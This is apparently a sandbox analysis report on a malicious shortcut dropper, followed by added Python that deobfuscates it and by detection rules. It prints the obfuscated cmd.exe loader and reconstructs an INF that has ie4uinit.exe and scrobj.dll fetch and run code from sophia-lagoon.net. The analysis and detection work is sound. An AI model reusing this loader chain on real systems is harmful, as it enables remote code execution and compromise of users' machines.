Windows Analysis Report
Education and Experience.lnk(1).zip

Overview

General Information

Sample Name:Education and Experience.lnk(1).zip
Analysis ID:16737
MD5:254c94d8e782c1e10fd3021b56638bc7
SHA1:cc6081254fa2a6f9c472123ad81534769e7dc6d3
SHA256:af67e631e6c185c8c127267fa57efffe589612feba6d43755ceda0a3104ac1ad

Detection

Score:52
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Very long command line found
Creates processes via WMI
Contains functionality to create processes via WMI
Drops PE files
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Deletes files inside the Windows folder
Creates COM task schedule object (often to register a task for autostart)
PE file contains sections with non-standard names
Binary contains a suspicious time stamp
Sample execution stops while process was sleeping (likely an evasion)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64_ra
  • cmd.exe (PID: 6460 cmdline: "C:\Windows\System32\cmd.exe" /v /c set "Lucky50=e" && set "Lucky5=$w" && set "Lucky03=version" && set "Lucky10=d" && (for %u in (a) do @set "Lucky87=%~u") && set "Lucky41=Fast" && call set "Lucky59=%Lucky41:~2,1%" && set "Lucky85=init" && set "Lucky7=t" && set "Lucky26=." && set "Lucky23=settings" && set "Lucky55=si" && (for %q in (c) do @set "Lucky29=%~q") && set "Lucky65=!Lucky26!inf" && set "Lucky15=ieu!Lucky85!!Lucky65!" && call !Lucky59!et "Lucky11=%app!Lucky10!ata%\micro!Lucky59!oft\" && !Lucky59!et "Lucky8=!Lucky11!!Lucky15!" && (for %p in ("[!Lucky03!]" "signature = !Lucky5!indows nt$" "[!Lucky10!e!Lucky59!tinationdirs]" "E4139C=01" "[!Lucky10!efaultin!Lucky59!tall.windows7]" "UnRegis!Lucky7!erOCXs=A687D4" "!Lucky10!elfil!Lucky50!s=E4139C" "[A687D4]" "%11%\scro\" "%Lucky51%j,NI,%Lucky21%%Lucky0%%Lucky0%p%Lucky1%%Lucky9%%Lucky9%sophia-lagoon!Lucky26!%Lucky56%/81754783" "[E4139C]" "ieu%Lucky69%!Lucky65!" "[!Lucky59!!Lucky7!rings]" "Lucky69=!Lucky85!" "Lucky0=t;Lucky40" "!Lucky59!ervicen!Lucky87!me=' '" "Lucky21=h" "Lucky1=:;Lucky35" "Lucky9=/" "!Lucky59!hortsvcn!Lucky87!me=' '" "Lucky56=net" "Lucky51=b;Lucky67" "Lucky25=%time%") do @e!Lucky29!ho %~p)>"!Lucky8!" && !Lucky59!et "Lucky2=ie4u!Lucky85!.!Lucky50!xe" && call xcopy /Y /C /Q %win!Lucky10!ir%\!Lucky59!ystem32\!Lucky2! "!Lucky11!*" | set Lucky93=Nation && !Lucky59!t!Lucky87!rt "" wmi!Lucky29! proce!Lucky59!s call !Lucky29!rea!Lucky7!e "!Lucky11!!Lucky2! -base!Lucky23!" 
| set Lucky28= Occur Elevator Knock Considerations Teens Stool Rankings Offices Message Toward Reviews Discusses Appliances Tasks Scorpion Situations Erase Shock Clean Vault Carriers Twins Disease Dentists Seeks Friends Impulse Vehicles Stand Submissions Night Batteries Cigar Junior Heart Habit Containers Cables Taxes Ostrich Series Incentives Sorts Erode Measurements Investigators Styles Music Actress Items Differ Suits Sources Archives Headphones Texas Emotions Monsters Above Holdings Outputs Characteristics Forecasts Readers Processes Plastic Mosquito Roses Manuals Representatives Editors Elephant Recommendations Roommates Coral Dolphin Offers Focuses Implies Ignore Champions Family Rangers Garlic Blind Evidence Facilities Products Makers Wives Pockets Solaris Vibrant Excess Raven Secrets Celebs Summaries Inherit Crawl Tutorials Stands Upgrade Crowd Betray Orange Patient Entire Weather Cruel Wellness Attention Waters Failures Jewel Buttons Assume Configurations Levels Enemy Labels Memories Ticket Honey Violin Primary Lovers Depends Exceptions Findings Olympics Cousin Kinds Fruits Centres Smart Avoid Mechanic Gorilla Swingers Century Figure Details Renew Careers Embody Shapes Antibodies Motion Interactions Instances Miles Subway Remain Legend Mounts Midnight Mercy Filter Sessions Asthma Shrimp Greetings Autumn MD5: 9D59442313565C2E0860B88BF32B2277)
    • conhost.exe (PID: 6468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: C5E9B1D1103EDCEA2E408E9497A5A88F)
    • cmd.exe (PID: 6520 cmdline: C:\Windows\system32\cmd.exe /S /D /c" call xcopy /Y /C /Q %windir%\system32\ie4uinit.exe "C:\Users\user\AppData\Roaming\microsoft\*" " MD5: 9D59442313565C2E0860B88BF32B2277)
      • xcopy.exe (PID: 6548 cmdline: xcopy /Y /C /Q C:\Windows\system32\ie4uinit.exe "C:\Users\user\AppData\Roaming\microsoft\*" MD5: F359375C36D2C540DFF1141B11BF2F7F)
    • cmd.exe (PID: 6532 cmdline: C:\Windows\system32\cmd.exe /S /D /c" set Lucky93=Nation " MD5: 9D59442313565C2E0860B88BF32B2277)
    • cmd.exe (PID: 6572 cmdline: C:\Windows\system32\cmd.exe /S /D /c" start "" wmic process call create "C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -basesettings" " MD5: 9D59442313565C2E0860B88BF32B2277)
      • WMIC.exe (PID: 6604 cmdline: wmic process call create "C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -basesettings" MD5: 29B7D02A3B5F670B5AF2DAF008810863)
        • conhost.exe (PID: 6612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: C5E9B1D1103EDCEA2E408E9497A5A88F)
    • cmd.exe (PID: 6580 cmdline: C:\Windows\system32\cmd.exe /S /D /c" set Lucky28= Occur Elevator Knock Considerations Teens Stool Rankings Offices Message Toward Reviews Discusses Appliances Tasks Scorpion Situations Erase Shock Clean Vault Carriers Twins Disease Dentists Seeks Friends Impulse Vehicles Stand Submissions Night Batteries Cigar Junior Heart Habit Containers Cables Taxes Ostrich Series Incentives Sorts Erode Measurements Investigators Styles Music Actress Items Differ Suits Sources Archives Headphones Texas Emotions Monsters Above Holdings Outputs Characteristics Forecasts Readers Processes Plastic Mosquito Roses Manuals Representatives Editors Elephant Recommendations Roommates Coral Dolphin Offers Focuses Implies Ignore Champions Family Rangers Garlic Blind Evidence Facilities Products Makers Wives Pockets Solaris Vibrant Excess Raven Secrets Celebs Summaries Inherit Crawl Tutorials Stands Upgrade Crowd Betray Orange Patient Entire Weather Cruel Wellness Attention Waters Failures Jewel Buttons Assume Configurations Levels Enemy Labels Memories Ticket Honey Violin Primary Lovers Depends Exceptions Findings Olympics Cousin Kinds Fruits Centres Smart Avoid Mechanic Gorilla Swingers Century Figure Details Renew Careers Embody Shapes Antibodies Motion Interactions Instances Miles Subway Remain Legend Mounts Midnight Mercy Filter Sessions Asthma Shrimp Greetings Autumn" MD5: 9D59442313565C2E0860B88BF32B2277)
  • ie4uinit.exe (PID: 6680 cmdline: C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -basesettings MD5: AD9AD3C852D59FBF125F02A09F1FF405)
    • ie4uinit.exe (PID: 6712 cmdline: C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -ClearIconCache MD5: AD9AD3C852D59FBF125F02A09F1FF405)
      • rundll32.exe (PID: 6764 cmdline: C:\Windows\system32\RunDll32.exe C:\Windows\system32\migration\WininetPlugin.dll,MigrateCacheForUser /m /0 MD5: F68AF942FD7CCC0E7BAB1A2335D2AD26)
  • ie4uinit.exe (PID: 6788 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe" MD5: AD9AD3C852D59FBF125F02A09F1FF405)
  • ie4uinit.exe (PID: 2792 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe" MD5: AD9AD3C852D59FBF125F02A09F1FF405)
  • ie4uinit.exe (PID: 6612 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe" MD5: AD9AD3C852D59FBF125F02A09F1FF405)
  • cleanup
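The cmd.exe line at the top of the process tree can be reduced mechanically, and doing so explains every other entry in the tree. The Python below is an added example, not part of the Joe Sandbox report: it emulates the handful of cmd.exe features the line relies on (immediate %var% expansion, delayed !var! expansion enabled by /v, the second expansion pass that CALL triggers, %var:~n,m% substring slicing, FOR-variable substitution, set/echo as internal commands, each side of a | as a child process) on the report's own command line, then resolves the text the FOR loop writes the way an INF parser does (a trailing backslash continues the line, a semicolon opens a comment, %key% tokens come from [strings]). The paths in BASE_ENV are the ones the report shows; the %time% value is made up; the word list piped into the final set Lucky28= is shortened because it runs in a child cmd.exe and has no effect; the emulator models only the cmd.exe behaviour this line needs, including the rule that an undefined %name% on a cmd /c line is left in place literally. The reconstruction matches the rest of the report: ieuinit.inf is written to %APPDATA%\microsoft\, the signed system binary ie4uinit.exe is copied next to it and started through WMI with -BaseSettings (which makes it process an ieuinit.inf from its own directory), the INF's UnRegisterOCXs section names scrobj.dll with http://sophia-lagoon.net/81754783 as the DllInstall argument (flags NI: skip DllUnregisterServer, call DllInstall), which is the HTTP GET the report records, and delfiles removes the INF afterwards.

```python
import re

# Added example, not part of the Joe Sandbox report: a minimal emulator of the cmd.exe features this one-liner abuses
# (set, /v delayed !var! expansion, CALL's second % pass, %var:~n,m% slicing, FOR variables) plus an INF resolver.
# Paths below are the ones the report shows; the %time% value is made up.
BASE_ENV = {"appdata": r"C:\Users\user\AppData\Roaming", "windir": r"C:\Windows", "time": "12:00:00.00"}
# The report's command line minus its '"C:\Windows\System32\cmd.exe" /v /c' prefix. The word salad piped into the
# last 'set Lucky28=' is cut short: it runs in a child cmd.exe and changes nothing.
CMDLINE = " ".join(r'''
set "Lucky50=e" && set "Lucky5=$w" && set "Lucky03=version" && set "Lucky10=d" && (for %u in (a) do @set "Lucky87=%~u") && set "Lucky41=Fast"
&& call set "Lucky59=%Lucky41:~2,1%" && set "Lucky85=init" && set "Lucky7=t" && set "Lucky26=." && set "Lucky23=settings" && set "Lucky55=si"
&& (for %q in (c) do @set "Lucky29=%~q") && set "Lucky65=!Lucky26!inf" && set "Lucky15=ieu!Lucky85!!Lucky65!"
&& call !Lucky59!et "Lucky11=%app!Lucky10!ata%\micro!Lucky59!oft\" && !Lucky59!et "Lucky8=!Lucky11!!Lucky15!"
&& (for %p in ("[!Lucky03!]" "signature = !Lucky5!indows nt$" "[!Lucky10!e!Lucky59!tinationdirs]" "E4139C=01"
"[!Lucky10!efaultin!Lucky59!tall.windows7]" "UnRegis!Lucky7!erOCXs=A687D4" "!Lucky10!elfil!Lucky50!s=E4139C" "[A687D4]" "%11%\scro\"
"%Lucky51%j,NI,%Lucky21%%Lucky0%%Lucky0%p%Lucky1%%Lucky9%%Lucky9%sophia-lagoon!Lucky26!%Lucky56%/81754783" "[E4139C]" "ieu%Lucky69%!Lucky65!"
"[!Lucky59!!Lucky7!rings]" "Lucky69=!Lucky85!" "Lucky0=t;Lucky40" "!Lucky59!ervicen!Lucky87!me=' '" "Lucky21=h" "Lucky1=:;Lucky35" "Lucky9=/"
"!Lucky59!hortsvcn!Lucky87!me=' '" "Lucky56=net" "Lucky51=b;Lucky67" "Lucky25=%time%") do @e!Lucky29!ho %~p)>"!Lucky8!"
&& !Lucky59!et "Lucky2=ie4u!Lucky85!.!Lucky50!xe" && call xcopy /Y /C /Q %win!Lucky10!ir%\!Lucky59!ystem32\!Lucky2! "!Lucky11!*" | set Lucky93=Nation
&& !Lucky59!t!Lucky87!rt "" wmi!Lucky29! proce!Lucky59!s call !Lucky29!rea!Lucky7!e "!Lucky11!!Lucky2! -base!Lucky23!" | set Lucky28= Occur Elevator Knock
'''.split())
PCT = re.compile(r"%([^%:]+)(?::~(-?\d+)(?:,(-?\d+))?)?%")   # %name% or %name:~start,len%
BANG = re.compile(r"!([^!]+)!")
FOR_RE = re.compile(r'^\(?\s*for\s+%(\w)\s+in\s+\((.*)\)\s+do\s+@?(.*?)\)?(?:\s*>\s*"?([^">]*)"?)?\s*$', re.I)
SET_RE = re.compile(r'^set\s+"?([^="]+)=(.*?)"?$', re.I)

def expand_percent(text, env):
    # Immediate expansion. On a 'cmd /c' line an undefined %name% stays in place literally, which is what
    # keeps the INF's own %Lucky51%-style tokens intact until advpack reads the file.
    def repl(m):
        val = env.get(m.group(1).lower())
        if val is None:
            return m.group(0)
        if m.group(2) is not None:                     # %var:~start,len%, e.g. "Fast"[2:][:1] -> "s"
            val = val[int(m.group(2)):]
        return val if m.group(3) is None else val[:int(m.group(3))]
    return PCT.sub(repl, text)

def expand_bang(text, env):                            # delayed (/v) expansion: !name! resolved at run time
    return BANG.sub(lambda m: env.get(m.group(1).lower(), ""), text)

def split_chain(line):
    # Split on top-level '&&' and '|'; operators inside (...) or "..." belong to the enclosed command.
    parts, buf, depth, op = [], "", 0, None
    for tok in re.findall(r'"[^"]*"|&&|\||[()]|[^"&|()]+|[&|"]', line):
        depth += (tok == "(") - (tok == ")")
        if depth == 0 and tok in ("&&", "|"):
            parts.append((op, buf.strip()))
            op, buf = tok, ""
        else:
            buf += tok
    return parts + [(op, buf.strip())]

def run_simple(cmd, env, files, trace, target=None):
    cmd = cmd.lstrip("@")                              # set/echo are modelled; anything else is a child process
    m = SET_RE.match(cmd)
    if m:
        env[m.group(1).lower()] = m.group(2)
    elif cmd.lower().startswith("echo "):
        files.setdefault(target or "<console>", []).append(cmd[5:])
    else:
        trace.append(cmd)

def execute(cmd, env, files, trace):
    # cmd.exe /v order: immediate %..% with the env as it was when the line was parsed, then !..!, then for CALL
    # a second % pass, which is the only moment %Lucky41:~2,1% and %appdata% get resolved.
    m = FOR_RE.match(cmd)
    if m:                                              # FOR: substitute %~x per item, then expand the body
        var, items, body, target = m.groups()
        target = expand_bang(target, env) if target else None
        for quoted, bare in re.findall(r'"([^"]*)"|(\S+)', items):
            line = expand_bang(expand_percent(body.replace("%~" + var, quoted or bare), BASE_ENV), env)
            run_simple(line, env, files, trace, target)
        return
    cmd = expand_bang(expand_percent(cmd, BASE_ENV), env)
    run_simple(expand_percent(cmd[5:], env) if cmd.lower().startswith("call ") else cmd, env, files, trace)

def emulate(cmdline):
    # Returns (env, files written, child commands). Each side of '|' runs in its own child cmd.exe (the report
    # shows them as separate cmd.exe processes), so the 'set' on the right of a pipe never reaches the parent.
    env, files, trace = dict(BASE_ENV), {}, []
    for op, cmd in split_chain(cmdline):
        if op != "|":
            execute(cmd, env, files, trace)
    return env, files, trace

def resolve_inf(lines):
    # INF lexing as setupapi/advpack do it: a trailing '\' joins the next line, ';' opens a comment and %key%
    # is taken from [strings]; unknown tokens such as the DIRID %11% (= System32) are left as they are.
    joined = re.sub(r"\\\n", "", "\n".join(lines)).split("\n")
    strings, section = {}, None
    for ln in joined:
        if ln.startswith("["):
            section = ln.strip("[]").lower()
        elif section == "strings" and "=" in ln:
            key, val = ln.split("=", 1)
            strings[key.strip().lower()] = val.split(";", 1)[0].strip()
    return [re.sub(r"%([^%]+)%", lambda m: strings.get(m.group(1).lower(), m.group(0)), ln) for ln in joined]

if __name__ == "__main__":
    env, files, trace = emulate(CMDLINE)
    print(*trace, "--- " + env["lucky8"] + " ---", *resolve_inf(files[env["lucky8"]]), sep="\n")
```

Run as a script it prints the two child commands and the reconstructed INF. The two commands come out character for character as the report lists them for xcopy.exe (PID 6548) and WMIC.exe (PID 6604), and the INF's [E4139C] delfiles entry is ieuinit.inf itself, so the file only exists on disk for the moment ie4uinit.exe needs it.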
No configs have been found
No yara matches
No Sigma rule has matched
No Snort rule has matched
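No Sigma rule matched in this run, but the process tree above contains enough to write detections for each stage. The Python below is an added example, not from the report and not from any published rule set: four process-creation rules run over constructed events that reproduce the report's tree in Sysmon event 1 shape (image, command line, PID and parent PID as listed; the parents of the WMI-spawned ie4uinit.exe and of the initial cmd.exe are not in the report and are set to 0; the long cmd.exe line is truncated). The rule names, the illustrative list of system-only binaries and the user-writable path markers are my assumptions, not the report's.

```python
import re

# Added example, not part of the Joe Sandbox report: process-creation rules for what the report's process tree
# shows (a System32 binary copied to AppData and started through WMI, plus a cmd.exe line built from set/!var!/call
# tricks). EVENTS are constructed from that tree in Sysmon EID 1 shape; parents of WMI-spawned processes are
# unknown and set to 0, and the long cmd.exe line is truncated. The watch lists below are illustrative assumptions.
EVENTS = [
    {"pid": 6460, "ppid": 0, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe" /v /c set "Lucky50=e" && set "Lucky5=$w" && set "Lucky03=version" '
                r'&& set "Lucky10=d" && (for %u in (a) do @set "Lucky87=%~u") && set "Lucky41=Fast" '
                r'&& call set "Lucky59=%Lucky41:~2,1%" && set "Lucky85=init" && set "Lucky7=t" && set "Lucky26=." '
                r'&& set "Lucky65=!Lucky26!inf" && set "Lucky15=ieu!Lucky85!!Lucky65!" '
                r'&& call !Lucky59!et "Lucky11=%app!Lucky10!ata%\micro!Lucky59!oft\" ...'},  # truncated
    {"pid": 6468, "ppid": 6460, "image": r"C:\Windows\System32\conhost.exe",
     "cmdline": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
    {"pid": 6520, "ppid": 6460, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'C:\Windows\system32\cmd.exe /S /D /c" call xcopy /Y /C /Q %windir%\system32\ie4uinit.exe "C:\Users\user\AppData\Roaming\microsoft\*" "'},
    {"pid": 6548, "ppid": 6520, "image": r"C:\Windows\System32\xcopy.exe",
     "cmdline": r'xcopy /Y /C /Q C:\Windows\system32\ie4uinit.exe "C:\Users\user\AppData\Roaming\microsoft\*"'},
    {"pid": 6604, "ppid": 6572, "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": r'wmic process call create "C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -basesettings"'},
    {"pid": 6680, "ppid": 0, "image": r"C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe",
     "cmdline": r"C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -basesettings"},
    {"pid": 6764, "ppid": 6712, "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"C:\Windows\system32\RunDll32.exe C:\Windows\system32\migration\WininetPlugin.dll,MigrateCacheForUser /m /0"},
]

SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
USER_WRITABLE = ("\\appdata\\", "\\users\\public\\", "\\programdata\\", "\\temp\\")
# Windows binaries that only ever live in the system directories; a copy elsewhere is the LOLBin-relocation pattern.
SYSTEM_ONLY = {"ie4uinit.exe", "regsvr32.exe", "rundll32.exe", "mshta.exe", "wscript.exe", "cscript.exe", "certutil.exe"}
COPY_TOOLS = {"xcopy", "xcopy.exe", "copy", "robocopy", "robocopy.exe"}

def norm(path):
    return path.lower().replace("%windir%", "c:\\windows").replace("%systemroot%", "c:\\windows")

def basename(path):
    return norm(path).rsplit("\\", 1)[-1]

def tokens(cmdline):                                   # quoted arguments stay whole
    return [q or bare for q, bare in re.findall(r'"([^"]*)"|(\S+)', cmdline)]

def in_system_dir(path):
    return norm(path).startswith(SYSTEM_DIRS)

def user_writable(path):
    return any(marker in norm(path) for marker in USER_WRITABLE)

def relocated_system_binary(ev):
    name = basename(ev["image"])
    if name in SYSTEM_ONLY and not in_system_dir(ev["image"]):
        return f"{name} executed from {ev['image']}"

def wmi_process_create_from_user_dir(ev):
    if basename(ev["image"]) != "wmic.exe":
        return None
    m = re.search(r'process\s+call\s+create\s+"?([^"]*)', ev["cmdline"], re.I)
    if m and user_writable(m.group(1)):
        return f"Win32_Process.Create -> {m.group(1)}"

def system_binary_copied_to_user_dir(ev):
    toks = tokens(ev["cmdline"])
    idx = next((i for i, t in enumerate(toks) if basename(t) in COPY_TOOLS), None)
    if idx is None:
        return None
    args = toks[idx + 1:]                              # only what follows the copy tool counts as source/target
    src = next((t for t in args if in_system_dir(t)), None)
    dst = next((t for t in args if user_writable(t)), None)
    if src and dst:
        return f"{src} -> {dst}"

def cmd_variable_obfuscation(ev):
    # Many set statements plus delayed-expansion references or %var:~n,m% slicing on a cmd /v line: the real
    # command text only exists after expansion, which is what the report's "very long command line" hints at.
    if basename(ev["image"]) != "cmd.exe":
        return None
    c = ev["cmdline"]
    sets = len(re.findall(r'\bset\s+"?\w+=', c, re.I))
    delayed = len(re.findall(r"!\w+!", c))
    substr = len(re.findall(r"%\w+:~-?\d+(?:,-?\d+)?%", c))
    if re.search(r"\s/v\b", c, re.I) and sets >= 5 and (delayed >= 3 or substr >= 1):
        return f"{sets} set statements, {delayed} delayed-expansion refs, {substr} substring extractions"

RULES = (relocated_system_binary, wmi_process_create_from_user_dir, system_binary_copied_to_user_dir,
         cmd_variable_obfuscation)

def detect(events):
    """(pid, rule name, detail) for every rule that fires on each event. Parent links are kept in EVENTS for
    correlation, but the rules stay per-event on purpose so they also work on partial telemetry."""
    return [(ev["pid"], rule.__name__, why) for ev in events for rule in RULES if (why := rule(ev))]

if __name__ == "__main__":
    for pid, rule, why in detect(EVENTS):
        print(f"{pid:>5}  {rule:<36} {why}")
```

On this event set the rules fire on cmd.exe 6460 (variable obfuscation), cmd.exe 6520 and xcopy.exe 6548 (System32 binary copied into AppData), WMIC.exe 6604 (Win32_Process.Create of an AppData path) and ie4uinit.exe 6680 (system-only binary running from AppData), and stay silent on conhost.exe and on the rundll32.exe child that ie4uinit.exe starts from System32.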

Source: Binary string: ie4uinit.pdbGCTL source: xcopy.exe, 0000000E.00000002.1487250753.000002784F9CB000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000013.00000000.1501414620.00007FF63F516000.00000002.00000001.01000000.00000006.sdmp, ie4uinit.exe.14.dr
Source: Binary string: ie4uinit.pdb source: xcopy.exe, 0000000E.00000002.1487250753.000002784F9CB000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000013.00000000.1501414620.00007FF63F516000.00000002.00000001.01000000.00000006.sdmp, ie4uinit.exe.14.dr
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe File opened: C:\Users\user\AppData
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe File opened: C:\Users\user
